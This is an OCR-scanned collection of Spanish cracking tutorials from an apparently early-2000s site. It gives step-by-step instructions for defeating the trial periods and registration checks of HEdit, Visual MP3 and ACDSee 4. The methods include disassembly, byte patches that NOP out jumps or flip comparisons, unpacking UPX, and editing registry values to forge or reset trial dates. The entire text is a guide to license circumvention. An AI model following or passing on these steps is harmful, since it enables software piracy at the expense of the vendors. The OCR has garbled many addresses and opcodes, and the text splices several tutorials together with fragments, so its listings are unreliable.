:0007.0916 B8E803 mov ax, 03E8 

:0007.0919 50 push ax 

:0007.091A B80000 mov ax, 0000 


:0007.091D BA0000 mov dx, 0000 
:0007.0920 52 push dx 

:0007.0921 50 push ax 

:0007.0922 9AFFFFOO0OO call USER.SETTIMER 
:0007.0927 3D0000 cmp ax, 0000 
:0007.092A 7403 je 092F 

:0007.092C E92C00 jmp 095B 


aqui podemos observar que la unica entrada a la rutina donde se encuentra el 
SETTIMER es desde :0007.0909 7503 JNE 090E, asi que vamos a aislar esta 
rutina eliminando el salto por :0007.0909 9090 NOP NOP 


de esta forma hacemos crecer a la aplicacion y terminamos 


*La amenaza elegante* 


El presente documento, es una tarea cientifica de investigacion, con caracter 


docente, no pretende violar ninguna ley vigente, el autor no se hace 
responsable del uso, manejo o practicas inadecuadas del analisis presentado 


(:0) 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de 
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Programa: HEdit v2.0 


PROTECCION: Lamirado a 30 dias de uso para evaluacion 
Descripcion: sastos Hexadecimal 

Dificultad: novaco 

DONNLOAD: | 


Herramientas: W32dasm v8.93, Editor Hexadecimal 


CRACKER: FECHA: 02/07/2001 
Fantomas: 


INTRODUCCION 


Primera parte: - Pues que les platico, sucede que sin saberlo se me paso el tiempo y de 
pronto esta aplicacion dejo de funcionar, al intentar iniciarla presentaba unicamente este 
mensage y terminaba 


asi que fue necesario habilitarla de nuevo (un buen reto para cualquiera) 


Segunda parte: - Tenia yo dos editores hexadecimales, uno de ellos es este, ambos dos los 
'creci', en una ocacion heche a andar uno de ellos y a los cinco minutos de uso me salto un 
error (Softlce me lo detecto), y como no me acorde cual de los dos editores estaba usando, 
volvi a revisar que hice mal en cada uno de ellos, aunque en realidad no fue necesario, ya 

que al fin termine encontrando como registrarme, rescate el original que tenia guardado y 

'babun lo registre 


*La amenaza elegante* 


AL ATAKE 


Primera parte: - Si alteras el reloj de tu ordenador podras darte cuenta que la aplicacion sufre las 
consecuencias, por lo que, lo mas recomendable es buscar la palabra time incrustada en la 
aplicacion 


Cargamos la aplicacion con wW32dasm y buscamos el texto time encontramos algunos, pero nos 
interesa algo como GetLocalTime y GetSystemTime, y de hecho es lo que estabamos esperando 
encontrar 


:00409CFO 81ECCCOOOOOO sub esp, O00000OCcc 
:D00409CFÉ6 8D442410 lea eax, dword ptr [esp+10] 
:D0409CFA 56 push esi 

:00409CFB 50 push eax 


* Reference To: KERNEL32.GCetlocalTime, Ord: O0EZh 
| 


:D00409D02 8D4C2404 lea ecx, dword ptr [esp+04] 
:00409D06 51 push ecx 


* Reference To: KERNEL32.CetSystemTime, Ord:0121h 
l 


:00409D07? FF151CA94400 Call dword ptr [0044491C] 
:00409DOD 668B0DDA47D4400 mov cx, word ptr [00447DDA] 
:D00409D14 66394C240E cmp word ptr [esp+0E], cx 
:00409D19 7?53C jne 00409D57 

:00409D1B 6641D87D4400 mov ax, word ptr [00447DD8] 
:00409D21 663944240C cop word ptr [esp+0C], ax 
:00409D26 752F jne 00409D57 


si observamos cuidadosamente, podremos darnos cuenta que la rutina inicia en la localidad 
:00409CEFO y si quieres hacerte bolas un rato, entonces analiza paso a paso cada instruccion, ve las 


comparaciones, los saltos condicionales, etc, etc y cuando deberas estes hecho un verdadero enredo, 
pon un ret en :00409CF0 y problema solucionado, esto es 


00409CF0 81 EC CC 00 00 00 


es sustituido por 


00409CF0 C3 90 90 00 00 00 
con esto la aplicacion vuelve a la vida y nosotros hemos aprendido algo mas 


O O OO O OO OOO OOO ORO! 


Segunda parte: - Como les esta comentando, si arrancas la aplicacion, te vas al menu Help y despues 
seleccionas About Hedit, te aparece una caja semejante a 


Ahora seleccionas Register y veras una caja de dialogo parecida a esta 


Observa el titulo ya que esta es la cadena que vamos a buscar incrustada en la aplicacion, cargamos 
la aplicacion con el w32dasm y buscamos la cadena Registration vamos a obtener cuatro 
direcciones: 


:00403F42, :00404593, :00405099, :00432A02 


de las cuales la primera es parte de la rutina que ayuda a crear la caja de dialogo, ya que se puede 


apreciar a simple vista que dice Possible StringData Ref from Data Obj -> 
"Registration Number" 


veamos la siguiente :00404593 aqui no encontramos ningun salto condicional, por lo que 
posiblemente aqui no este la rutina de verificacion, veamos la siguiente :00405099 , aqui hay mas 
probabilidad ya que tres instrucciones antes hay un salto condicional, rapidamente podemos probar 
si tenemos razon, cambiemos 


:00405093 75 10 por :00405099 74 10 y efectivamente al poner cualquier nombre y 
seleccinonar el boton OK solamente se cierra la caja de dialogo sin presentar el mensage de error 


sin embargo aun no estamos registrados unicamente se evita el mensage de error (si por casualidad 
pones el bueno, entonces te salta el mensage de error), veamos que este salto condicional esta 
directamente afectado por el resultado de la rutina anterior 


Osea :0040508C E82DEFFFFF CALL 00403FBE vayamos pues y analicemos la rutina (recueda 
restaurar :00405093 75 10) veamos que inicia en la direccion :00403FBE y termina en :00404036 
con Un RET 0008 


200404015 “CDB 

: 00404017 SBS500FFFFFF 
:0040401D 85c0 
:0040401F 7DOZ 
:00404021 F7?DS 
200404023 39450C 
200404026 7509 
200404028 85C0 
200404024 BS01000000 
:0040402F 7502 
200404031 3300 
:00404033 SBE5 
200404035 5D 
200404036 C20800 


jl 00403FF2 


mov eax, dword ptr [ebp+FFFFFFOO] 


test eax, eax 

jge 00404023 

neg eax 

comp dword ptr [ebp+0C], eax 
jne 00404031 

test eax, eax 

mov eax, 00000001 
jne 00404033 

xor eax, eax 

mov esp, ebp 

pop ebp 

ret 0008 


Lo mas interesante de esta rutina se encuentra casi al final 


:00404023 CMP DWORD PRT [EBP+0C], 


:00404026 JNE 00404031 
:00404031 XOR EAX, EAX 


:00404033 ----> :00404035 
:00404036 RET 0008 
:00405091 TEST EAX,EAX 
:00405093 JNE 004050A5 
:00405095 ----> :0040509E 
:00405093 CALL 00424D5F 


la otra opcion es 


:00404023 CMP DWORD PRT [EBP+0C], 


:00404026 JNE 00404031 
:00404028 TEST EAX, EAX 
:00404028 MOV EAX, 00000001 
:00404028 JNE 00404033 
:00404033 ----> :00404035 
:00404028 RET 0008 
:00405091 TEST EAX,EAX 
:00405093 JNE 004050A5 


aqui compara nuestros datos 
si son distintos salta 


pone la bandera a cero 

sin comentarios 

regresa a :00405091 

verifica que EAX sea cero 

si es distinto de cero salta ( Ok ) 
prepara el mensage de error 
rutina del mensage de error 


aqui compara nuestros datos 
si son iguales continua 


verifica si EAX es igual a cero 
pone a 1 el registro EAX 

sIEAX era distinto de 1 vas bien 

sin comentarios 

regresa a :00405091 

verifica que EAX sea cero 

si es distinto de cero salta ( Ok ) 


espero que ya adivinaron que vamos a hacer, unicamente cambiaremos 


:00404026 JNE 00404031 


por 


:00404026 JE 00404031 


sustituyes, arrancas la aplicacion y listo el nombre que habias puesto anteriormente es ahora el 


si son iguales continua 


si son distintos continua 


registrado 


*La amenaza elegante* 
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Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 1999-2001 


Visual MP3 v3.5 


Número de serie y límite de 30 días 
Eliminar el límite de 30 días 


Con Visual MP3 podrás editar la información 1D3, buscar en segundos el MP3 que quieras, crear 
listas de canciones MP3, añadir letras, se integra con WinAmp a la perfección y muchas más 
cosas 


Novato 


wWWww.iprogramdev.com 
File insPEctor, UPX, W32Dasm y Hex Workshop 
Pepote FECHA: 18/11/2001 


INTRODUCCION 


Hola a todos. Éste es mi primer tutorial, así que disculpad los errores. 
Empecemos con una descripción del programilla: 


Visual MP3 es un práctico y rápido programa para organizar, encontrar y reproducir tus ficheros MP3 de la 
forma más rápida y eficiente posible. 


Tras un rápido escaneo de tu disco duro o CD, tendrás perfectamente clasificados todos los archivos MP3 que 
poseas. Los podrás ordenar alfabéticamente, por nombre del intérprete, del álbum o usar el potente buscador 
integrado que posee. 


Con Visual MP3 podrás editar la información 1D3, buscar en segundos el MP3 que quieras, crear listas de 
canciones MP3, añadir letras, se integra con WinAmp a la perfección y muchas más cosas. 


Todo ello desde una agradable y práctica interfaz que hace que Visual MP3 sea una opción más que 
interesante para ser el primer paso para disfrutar del audio digital. 


Recogido de www.Softonic.com 


AL ATAKE 


Primero que nada, vamos a ver cómo es el programa. Entramos y en la parte inferior dice que no estamos registrados y los 
días que llevamos usándolo. Si cambiamos la fecha y la ponemos 2 meses después, por ejemplo, el Visual MP3 nos dirá que ya 
ha acabado el período de evaluación (Sorry, you are on day 30 bla bla bla). 


Pos le pasamos el File insPEctor XL. Nos dice que está comprimido con UPX. Bueno, pos habrá que descomprimirlo. Agarramos 
el UPX v1.20 y escribimos: 'UPX -d -k Visual —1.exe' (-d es para que descomprima y -k para que guarde una copia del original). 
Bien. Tenemos el ejecutable descomprimido. Vamos a desensamblarlo y buscamos la String Ref 'Sorry, you are...'. Aparecemos 
aquí: 


* Referenced by a (U)inconditional or (C)jonditional Jump at Address: 


|1:0041FD7?1(C) 
l 
:0041FDBF 6400 push 00000000 
:0041FDC1 SDS8D?SBCFFFF lea ecx, dword ptr [ebp+FFFFEC?S] 
:0041FDC7? ES34A6FEFF call 00404400 
:0041FDCC C745FCOSOO00000 mov [ebp-04], 00000005 
=>"period." 
l 
:0041FDD3 68144E74500 push 00455744 
:0041FDDS SDSDD4BCFFFF lea ecx, dword ptr [ebp+FFFFECD4] 
:0041FDDE 51 push ecx 
:0041FDDF ESé61F80000 call 0042F645 
:0041FDE4 830408 add esp, 00000008 


Vemos que venimos de un salto, concretamente de la dirección 0041FD71. Le damos al botón de 'Goto Code Location' y 
metemos esa dirección. |remos a parar justo encima en donde pone: 


cmp dword ptr [ebp + FFFFFF30], O0O00001E 
jg 0041FDBF 


Bien. 1E son los 30 días del límite temporal, y saltará si han pasado más de 30 días (J ump-If-Greater). Lo que haremos será 
parchear esto. Nopearemos el salto y cambiaremos el 1E por 00. Anotamos el Offset marcado por el W32Dasm y nos vamos al 
hex Workshop. Ctrl+G para buscar el offset y caemos aquí: 


9001FD70 | TI6A 008B 8D30 FFFF FF51 8D8D 8408 FFFF E8D9 6200 80807 
0091FD88|45FC 0400 0000 8B95 BA4A7 FFFF 8D85 8400 FFFF 8942 108D 8D84 


Nos ponemos en 7F y escribimos 90 90. Guardamos y abrimos el programa. Entra sin problemas. Cambiamos la fecha y la 
ponemos bien, y ejecutamos de nuevo el programa. ARG!. Salta. ¿¿POR QUÉ??. Si han pasado 30 días funciona y si no han 
pasado no funciona ¿¿??. Pues vamos a arreglarlo. Si en los primeros 30 días no funciona, cambiaremos esos 30 días por 0, y 
funcionará siempre. Pues manos a la obra. Volvemos al Hex Workshop y en el mismo offset, en donde pone 1E lo cambiamos 
por 00. Ejecutamos y salta de nuevo. Lógicamente hay otra comprobación. Volvemos al VW32Dasm y buscamos la String Ref 
'Sorry, your registrarion information...'. Doble click y caemos aquí: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0041F981(0), :0041FAC3(C), :0041FBDD(C) 
l 


D041FBE9 SB4DDC mov ecx, dword ptr [ebp-24] 
:0041FBEC 81C1D2040000 add ecx, DO00004DZ 

:0041FBF2 S894DDC mov dword ptr [ebp-24], ecx 
D041FBF5 SBS5E0O mov edx, dword ptr [ebp-20] 
:0041FBF8S S1C2FA000000 add edx, OO00D00FA 

0041FBFE S955E0 mov dword ptr [ebp-20], edx 
:0041FCO1 8B45E4 mov eax, dword ptr [ebp-1C] 
:0041FC04 0S5A7?010000 add eax, 000001147 

:0041FC09 8945E4 mov dword ptr [ebp-1C], eax 
:0041FCOC SIBDIOFFFFFFFC cmp dword ptr [ebp+FFFFFF30], FFFFFFFC 
:0041FC13 OFS5FO000000 jne 0041FDO9 

:0041FC19 SBSD24FFFFFF mov ecx, dword ptr [ebp+FFFFFF24] 
0041FC1F 51 push ecx 


* Reference To: ADVAPI32.RegCloseKey, Ord: 0000h 
l 


:0041FC20 FF1510F04400 Call dword ptr [0044FO10] 
:0041FC26 6400 push 00000000 

:0041FC28 SDSDFCE?FFFF lea ecx, dword ptr [ebp+FFFFE?FC] 
:0041FC2E ESCDA?FEFF call 00404400 

:0041FC33 C745FCO1O00000 mov [ebp-04], 00000001 


* Possible StringData Ref from Data 0b3j ->"Sorry, your registration information ” 
=>"is mistake." 
| 


:0041FC3F SD9558ESFFFF lea edx, dword ptr [ebp+FFFFES58] 
:0041FC45 52 push edx 

:0041FC46 ESFAF90000 call 0042F645 

:0041FC4B 830408 add esp, 00000008 


Esta vez este mensaje se llama desde 3 direcciones distintas. Probamos primero con 0041F981. Un J MP sin interés. Vamos a 
probar con 0041FAC3. Bingo!!. Una nueva comprobación. 


cmp dword ptr [ebp + FFFFFF30], O0O00001E 
jg 0041FBE9 


Pues vamos a cambiar el 1E por 00. Guardamos y listo. Ya tenemos el programa crackeado. 

Ahora vamos a rematarlo. En la parte inferior sigue apareciendo 'Visual MP3 - Unregistered version - Day 13 of 30' y en About 
aparece 'Version 3.5 - Unregistered". Pues vamos a cambiarlo. Volvemos al Hex Workshop. Ctlf-++F para buscar. Seleccionamos 
"Text String' y ponemos 'Unregistrered'. Vemos el texto de About, que empieza en el offset 5E354. A la derecha, hacemos click 
justo ante de Version... y escribimos, por ejemplo, 'Registered to Pepote G.G.'. Hay que tener cuidado de no sobreescribir lo 
que viene después, en este caso 'USER32.DLL'. Si nos sobra espacio, tendremos que rellenar con ceros al final. Quedaría así: 


90900 0000 5265 6769 7374 6572 6564 2074 6F28 5065 706F 7465|....Registered to Pepote 
2047 247 2EBÉ 0000 5553 4552 3332 2E44 4C4C 0090 416E 696D| G.G.. -USER32.DLL..Anim 


Como vemos, el final sobraba 1 caracter, y se rellena con ceros. 

Presionamos F3 y caemos en el texto de la parte inferior, y cambiamos el Version 3.5 - Unregistered version' por cualquier 
cosa que se nos ocurra, como por ejemplo 'Regisrered to Pepote García García'. También si os disgusta eso de 'Day tal of 30' 
se cambia de la misma manera. Se escribe por encima o se cambia todo por ceros. 


A que era fácil. También se puede crackear buscando la comparación del serial, pero quería mostrar cómo podemos cambiar 
todo lo que nos dé la gana en el programa. 


Me gustaría felicitar a Karpoff por su Web. Sin él muchos no habríamos podido ni empezar en este arte del cracking. Gracias. 


Contactar con Spider Studios 


Para cualquier duda, sugerencia o crítica: 


E-mail: 


World Wide Web: 


SpiderStudiosoEmatic.com 
SpiderStudiosoHotPOP.com 
PepoteGEmatic.com 


www.SpiderStudios.es.fm 
www.SpiderStudios.cjb.net 
www.SpiderStudios.tsx.org 


CopyrightO 1997-2001 Spider Studios 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. 


Email "Colabora con tus Proyectos" 


sobre 


Karpoff Spanish Tutor 1999-2002 


Programa ACDSee 4.0.1.0598 


PROTECCION: Tiempo Limite, Extension Code. 
Descripcion: El espectacular para ver imagenes 


Dificultad: 


Entre Facil y Media 


DOWNLOAD : http: //www.acdsystems.com 


W32dasm, Hiew, RegEditor, Cerebro(usalo para algo lo tienes), Quick 
Herramientas: View Plus o cualquier visor de archivos DLL o de funciones 
importadas y exportadas. EJ:File Inspector XL 


CRACKER: 


Gohan /KuT] 


FECHA: 03 De Enero 2002 


INTRODUCCION 


Hola soy Gohan, saludos a todos, tal vez nadie se acuerde de mi llevo mucho tiempo fuera del cracking, pero 
lo raro es que como que regreso siempre con mas fuerza, si alguno se acuerda seria Maniac PC, Numit Or, 
Karpoff, si no, he sido olvidado en el tiempo, saludos a todos, espero que hallan recibido bien el año. 
Demosle Play a esta cachalaca. 


AL ATAKE 


Instalamos nuestro ACDSee 4, manos a la obra, ejecutamos esta cosa y observamos una ventanita que dice 
"Buy ACDSee Now", y otro poco de estupideces, pero lo bueno es"Extend My Evaluation Period 45 Days" le 
damos y nos aparece la paja de "Intouch" ese que a nadie le importa, lo pasamos y rodamos nuestro 
ACDSee, lo cerramos. 


Toda esa info de Evaluación la hay de almacenar en algún lado, lo 

más común en el registro de Windows, le damos buscamos y blah blah 

en contramos en "HKEY_LOCAL_MACHINE SoftwarelACD SystemslACDSee" 
y Vemos varia Info que después trataremos. 


Adelantamos la fecha de windows,(que se yo un año tal vez). 
Rodamos el Acdsee y nos manda una ppppppppta. pantalla dicendonosy que para renovar nuestra licencia introducir un 


codigo, le damoscancel y nos menta la madre, le damos a "No Thanks", nos aparece otra de esas y para extender 15 dias 
pero hay hacerlo por Intouch y yo sinceramente no me voy a enrredar con eso. 


Toda esa info de Evaluación la hay de almacenar en algún lado, lomás común en el registro de Windows, le damos 
buscamos y blah blahen contramos en "HKEY_LOCAL_MACHINESoftwarelACD SystemslACDSee”" algo 
interesante, los siguiente valores: 


Nombre Datos 


(ab] [Predeterminado] [valor no establecido) 
¿AppMode 23 00 00 00 
ab] AppProfilelD "(ADD 3C000-FAC3-11d5-8871-86D444D54077)50 
[ab] E yalExpire "FNJBJMOGGHCHOEFH22BCD81D" 
[ab] InstallationD ate "FNJBJMOGGHCHOEFH22BCD81D" 
lab] LastáccessTime "FNJBJMOGGHCHOEFH22BCD81D" 
[ab] TrialStartD ate "FNJBJMOGGHCHOEFH22BCD81D" 
22] UsageCount 01 00 00 00 
22] welcomeNag 00 00 00 00 


-Como observamos hay unos que son logicos: 


AppMode: anteriormente antes de adelantar la fecha decia 1E ahora 
dice 23(es una sigla de "ApplicationMode”). 


AppProfileID: en el mio Dice 
[ADD3C000-FAC3-11d5-8871-86DA4AD54C77)503876792 
He de Suponer que es la Identificación cuando 

inicia el software. 


EvalExpire: posee la fecha cuando va a expirar 
pero esta encriptada. 


InstallationDate: la fecha cuando se instalo(encriptada). 
LastAccesTime: ultima ejecución(encriptada). 
TrialStartDate: cuando empieza la evaluación(encriptada). 
UsageCount: número de veces ejecutada la aplicación. 


WelcomeNag: la 1ra vez que la vimos estaba en 01000000 ahora esta en 
00000000, 1 es TRUE, 0 es FALSE. 


Borramos "HKEY_LOCAL_MACHINESoftwarelACD SystemslACDSee” y lo rodamos 


Que tal Nos aparece con el tiempo de evaluación,si se quiere se ejecuta 
el "About" y dice que el Tiempo de Evaluación a Terminado. 


Vamos al registro y nos aparece: 


Datos 
[valor no establecido] 


(Predeterminado) 


22] AppMode 23 00 00 00 

[ab] AppProfilelD "[BECODO20-FACC-11d5-8871-86DA4AD54C77)2£ 
lab] E valExpire "BOIOKMAGGHCHOEFAD2874955" 

InstallationD ate "BOIJOKMAGGHCHOEFAD2874955" 


ab] LastáccessTime  "BOIOKMAGGHCHOEFAD2874955" 
"BOIOKMAGGHCHOEFAD2874955" 

01 00 00 00 

R%] welcomeN ag 00 00 00 00 


Rodamos nuevamente el ACDSee pero aparece expirado. 

En este Momento la fechas son iguales y por eso expira. (ver imagen) 

Lo que podemos hacer es usar el propio ACDSee 4 para generar una fecha de evaluación encriptada. 
Adelantamos nuestro reloj un ejemplo Diez Años 


Borramos "HKEY_LOCAL_MACHINESoftwarelACD SystemslACDSee" y rodamos el 
ACDSee, Lo ejecutamos, cerramos. 


Vamos al registro: (no se austen si son diferentes lo que pasa es que siempre genera codigos diferentes cada vez que se 
borre el registro como se imagina yo lo he borrado :] ) 


Nombre Datos 


ab] [Predeterminado] [valor no establecido) 
28] AppMode 23 00 00 00 
[ab] AppProfilelD 'F1489D60-118F-11e0-8872-85D444D54077)91' 
[ab] EvalExpire '"JBHGHJEGGHCBALEEDA573530" 
[ab] InstallationD ate '"JBHGHJEGGHCBALEEDA573530" 
ab] LastáccessT ime '"JBHGHJEGGHCBALEEDA573530" 
[ab] TrialStartDate '"JBHGHJEGGHCBALEE0A573530" 
22] UsageCount 01 00 00 00 
WéelcomeNag 00 00 00 00 


Copiamos en algun lado (un Notepad) el valor de: 
EvalExpire. En mi caso: 
EvalExpire=J3BHGHJEGGHCBALEE0A573530 


Ahora Borramos "HKEY_LOCAL_MACHINESoftwarelACD SystemslACDSee", retrocedemos el tiempo de windows 
a la fecha actual, rodamos ACDSee 4, lo ejecutamos, luego lo cerramos(esto genera las llaves del registro y coloca en el 
TrialStarDate la fecha actual asi como en LastAccesTime). 


Rodamos el Registro, Cambiamos el valor de EvalExpire por la fecha Encriptada que obtuvimos. (si somos buenos 
observadores se habran dado cuenta que antes de Ejecutar ACDSee WelComeNag=01000000 y después de haberse 
ejecutado WelcomeNag=00000000). 


Ejecutamos el ACDSee 4 y nos aparece una ventana para agregar el ExtensionCode la cancelamos,nos aparece una 
venta para comprar el producto, le damos a "Not Now" y arranca el ACDSee 4, le damos 
a "About" y nos aparece un poco de dias para evaluar, Cerramos. ¿Como eliminaremos esto?. 


Vamos al Registro: 


Nombre | Datos 
[valor no establecido) 


[Predeterminado] 


28] AppMode 23 00 00 00 

[ab] AppProfilelD "(924E1850-FAD4-11d5-8873-86DA4AD54C77)64; 
[ab] E yalExpire "JBHGHJEGGHCBALEE0A573530" 

(ab] InstallationD ate "DBBLOEEGGHCHOFGI12F8E183" 

ab] LastáccessTime  "DBBLOEEGGHCHOFGIM2F8E183" 

[ab] TrialStartD ate "DBBLOEEGGHCHOFGI12F8E183" 

7] UsageCount 01 00 00 00 

82] welcomeNag 00 00 00 00 


Se acuerdan del "AppMode", la Lra vez que ejecutamos ACDSee estaba como valor 1E y ahora esta a 23, yo creo que 
ACDSee lee este dato,si esta en 1E esta en Evaluación, 23 ha expirado. Podriamos colocarlo como 1E para estar en 
evaluación. Aunque podriamos probar: 


Cambiamos "AppMode=00000000" y ahora tenemos nuestro ACDSee 4 practicamente full. 


OTRO PUNTO DE ATAQUE: 
Modificar el valor de: 
WelcomeNag=01000000 


Asi la Nag va a estar a True y siempre podremos entrar por esta Nag. 
El Problema se presenta que cada vez que se ejecute. 


OTRO PUNTO DE ATAQUE MAS: 
En el Directorio de ACDSee4 hay una DI] llamada License.DLL, como se habran dado cuenta estos programadores 
provoca insultarlos pero mejor asi tenemos software gratiñanga. 


Usamos el QuickView Plus o Cualquier otro SoftWare que sea capas de darnos la info de una dll. Veamos La tabla de 
Exportaciones: 


Export Table 


Name: License.dll 
Characteristics: 00000000 

Time Date Stamp: 3c17c184 
Version: 0.00 

Base: 00000001 

Number of Functions: 00000039 
Number of Names: 00000039 


Ordinal Entry Point Name 

0000 000027f0 ??0CLicenseo EQAEEXZ 

0001 00001210 ??0License_Callback_Classe EQAECABVOO EZ 

0002 000011f0 ??0License_Callback_Classe OQAEEXZ 

0003 00002860 ??1CLicenseo OQAECEXZ 

0004 00001200 ??1License_Callback_ClassO ACUAECXZ 

0005 00001290 ??4CLicense o OCOAFEAAVOOCABVOO OZ 

0006 00001220 ??4License_Callback_Class EQAFAAVOOCABVOO OZ 
0007 000104c8 ??_7License_Callback_ClassO 46B OE 

0008 00001ce0 ?AppShutdownECLicenseO OQAEHXZ 

0009 00001cf0 ?AppStartupO CLicense E OQAEHXZ 

000a 00002bc0 ?BrowseSmartURL ECLicense o ECOAEHHOZ 

000b 00002ba0 ?BrowseURL CCLicenseo OQAEHHOZ 

000c 00002b80 ?BrowseURLECLicenseOo EQAEHPBDEZ 

000d 00002ca0 ?DecodeDateE CLicense o ECOAEHPBDAAU_FILETIMEC O EZ 


000e 000027c0 ?DoLicensingO CLicense Oo OQAEHXZ 

000f 00002c10 ?EncodeDate O CLicensee ECQAEHABU_FILETIMEO OPADEZ 

0010 000027€0 ?FreeOCLicense OQAEXXZ 

0011 00002e40 ?GetAppModeOCLicense Oo OQAE?AW4typAppMode O O XZ 

0012 00002ae0 ?GetCompanyIDOCLicense O OQAEHXZ 

0013 00002b20 ?GetCompanyName O CLicenseo OQAEHPADOZ 

0014 00002950 ?GetInstallDate O CLicenseO OQAEHPAU_FILETIMEO O EZ 

0015 00001ce0 ?GetLicenseDLLType OCLicenseO OQAEHXZ 

0016 00002af0 ?GetProductIDE CLicenseO OQAEHXZ 

0017 00002be0 ?GetSmartURLO CLicense Oo ECOAEHPBDPADIOZ 

0018 00002b40 ?GetUserEMailOCLicenseo EQAEHPADEZ 

0019 00002b60 ?GetUserIDO CLicenseo OQAEHPAU_GUIDO GC EZ 

001a 00002b00 ?GetUserNameA OCLicense O OQAEHPADOZ 

001b 00001da0 ?IniteCLicensee EQAEHPBVCApplnfoE EPAVLicense_Callback_ClassO EZ 
001c 0000280 ?IsFirstRunAfterInstall O CLicenseO EQAEHXZ 

001d 00002ef0 ?IsFirstRunInThisTrial OCLicense O OQAEHXZ 

001e 00001ce0 ?IsFloatingVersionOCLicense O OQAEHXZ 

001f 00001ce0 ?IsFull Version CLicense o OQAEHXZ 

0020 00002740 ?LicenseKey_GetOCLicenseO OQAEHPADEZ 

0021 000027b0 ?LicenseKey_GetInfoO CLicense 0 OQAEHPBDPAH111Z 

0022 00002740 ?LicenseKey_IsValidOCLicenseo OQAEHPBDEZ 

0023 00002740 ?LicenseKey_SetOCLicenseo OQAEHPBDOEZ 

0024 00002dc0 ?SetAppMode ECLicenseO EQAEJW4typAppMode0 0HOZ 

0025 00002880 ?SetInstallDate OCLicense OQAEHPBU_FILETIMEO O EZ 

0026 000031b0 ?ShowInputDlgO CLicense o EQAEHXZ 

0027 00003110 ?ShowNagDlgCLicenseO CQAEHPAHOEZ 

0028 000027d0 ?ShowSystraylconOCLicenseo OQAEXXZ 

0029 00002f60 ?ShowWelcomeDlgO CLicenseOo OQAEHXZ 

002a 00002040 ?TrialPeriod_GetDaysLeftO CLicenseo OQAEHXZ 

002b 00002720 ?TrialPeriod_GetDaysPassedInThisPeriodO CLicense 6 OQAEHXZ 

002c 00001180 ?TrialPeriod_GetExpireDate OCLicense Oo OQAEHPAU_FILETIMEC O EZ 
002d 00002340 ?TrialPeriod_GetLastAccessDateO CLicenseo EQAEHPAU_FILETIMEO E EZ 
002e 00002590 ?TrialPeriod_GetThisPeriodStartDate OCLicenseO SEQAEHPAU_FILETIMEO 6 EZ 
002f 00001e30 ?TrialPeriod_InitOCLicenseo OCQAEHHEZ 

0030 000021€e0 ?TrialPeriod_IsReminderDue ECLicenseO OEQAEHPBHHEZ 

0031 00002170 ?TrialPeriod_RemindToday OCLicense Oo OQAEHXZ 

0032 00001ec0 ?TrialPeriod_SetExpireDate OCLicense o EOQAEHPBU_FILETIMEO E EZ 
0033 000022€e0 ?TrialPeriod_SetLastAccessDateO CLicenseO EQAEHPBU_FILETIMEEC O EZ 
0034 000024c0 ?TrialPeriod_SetThisPeriodStartDate OCLicense o OQAEHPBU_FILETIMEO O EZ 
0035 00002d80 ?UsageCount_GetOCLicense O OQAEHXZ 

0036 00002db0 ?UsageCount_IncrementO CLicense 0 OQAEHXZ 

0037 00002d90 ?UsageCount_SetO CLicense o OQAEHHOEZ 

0038 00014bd8 ?g_licenseo E3VCLicense O OA 


Como Pueden obeservar "IsFullVersion CLicense € OQAEHXZ" parece 
interesante desamblamos el License.DIl vamos a esa zona 
(ustedes ya saben hiendo a las funciones importadas) a ver que tal: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:100027E0(U) 


Exported fn(): ?AppShutdownOCLicense € OQAEHXZ - Ord:0009h 
Exported fn(): ?GetLicenseDLLTypeOCLicense O EQAEHXZ - Ord:0016h 
Exported fn(): ?IsFloatingVersion O CLicense EQAEHXZ - Ord:001Fh 
Exported fn(): ?IsFullVersionO CLicense O OQAEHXZ - Ord:0020h 
:10001CEO0 33C0 xor eax, eax 

:10001CE2 C3 ret 


:10001CE3 90 nop 
:10001CEFA4 90 nop 
:10001CES 90 nop 
:10001CE6 90 nop 
:10001CE7 90 nop 
:10001CES 90 nop 
:10001CE9 90 nop 
:10001CEA 90 nop 
:10001CEB 90 nop 
:10001CEC 90 nop 
:10001CED 90 nop 
:10001CEE 90 nop 
:10001CEF 90 nop 


Como vemos nos han eliminado la inicialización si esta registrado, 
por lo menos no son tan descarados. 


Si Buscan "DoLicensingO CLicenseO GQAEHXZ" observaran el mismo 
caso. 


Nos metemos en "ShowWelcomeDlgCLicense o EQAEHXZ": 


* Referenced by a CALL at Address: 
1:10003214 --> OJO 


Exported fn(): ?ShowWelcomeDlgOCLicense O OQAEHXZ - Ord:002Ah 
:10002F60 81EC14030000 sub esp, 00000314 

:10002F66 56 push esi 

:10002F67 8BF1 mov esi, ecx 

* Reference To: License. ?IsFirstRunAfterInstall CLicense o ECQAEHXZ 


:10002F69 E812FFFFFF call 10002E80 
:10002F6E 85CO0 test eax, eax 

:10002F70 750D jne 10002F7F 

:10002F72 B801000000 mov eax, 00000001 
:10002F77 5E pop esi 

:10002F78 81C414030000 add esp, 00000314 
:10002F7E C3 ret 


Entramos en la llamada "call 10002E80" a ver que hace: 


Exported fn(): ?IsFirstRunAfterInstall E CLicense o EQAEHXZ - Ord:001Dh 
:10002E80 83EC08 sub esp, 00000008 

:10002E83 56 push esi 

:10002E84 8BF1 mov esi, ecx 

:10002E86 8B460C mov eax, dword ptr [esi+0C] 
:10002E89 85CO0 test eax, eax 

:10002E8B 7555 ¡ne 10002EE2 

:10002E8D 89442404 mov dword ptr [esp+04], eax 
:10002E91 8D442408 lea eax, dword ptr [esp+08] 
:10002E95 8D4C2404 lea ecx, dword ptr [esp+04] 
:10002E99 50 push eax 

:10002E9A 51 push ecx 

:10002E9B 8B4E04 mov ecx, dword ptr [esi+04] 


* Possible StringData Ref from Data Obj ->"WelcomeNag" 


:10002E9E 6884410110 push 10014184 

:10002EA3 C744241404000000 mov [esp+14], 00000004 
:10002EAB E8000F0000 call 10003DB0 

:10002EBO 85CO0 test eax, eax 

:10002EB2 741C je 10002EDO 

:10002EB4 8B4E04 mov ecx, dword ptr [esi+04] 
:10002EB7 8D542404 lea edx, dword ptr [esp+04] 
:10002EBB 6A04 push 00000004 

:10002EBD 52 push edx 


* Possible StringData Ref from Data Obj ->"WelcomeNag" 


:10002EBE 6884410110 push 10014184 
:10002EC3 C744241001000000 mov [esp+10], 00000001 
